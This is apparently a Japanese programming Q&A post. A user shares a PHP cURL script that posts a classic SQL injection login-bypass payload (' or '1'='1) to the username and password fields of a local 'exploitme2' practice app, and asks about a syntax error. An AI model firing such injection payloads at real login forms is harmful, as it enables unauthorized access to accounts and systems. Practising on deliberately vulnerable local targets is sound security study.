私は。。をしようとしています:
- アクセス
$url
- 2つのインデックスの(2)値を対応する入力フィールド(ユーザー名、パスワード)に挿入し、送信します。
- 最後に、#2での入力と送信、および応答の出力から応答を取得します。
私は次のコードを持っています:
<?php
# get url to form
$url = "http://localhost/exploitme2/index.php?page=login.php";
$ch = curl_init($url); # initialize that form
#run value of $_POST variable in form fields from above url.
$params = array("'' or '1'='1'", "'' or '1'='1'");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params); #set parameter $_POST fields
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
## echo the result from cURL 'ing
echo $result;
curl_close($ch);
?>
このエラーが発生します:
syntax error, unexpected '=', expecting ')'
この行で:
$params = array($_POST['username']=>'' or '1'='1',
$_POST['password']=>'' or '1'='1');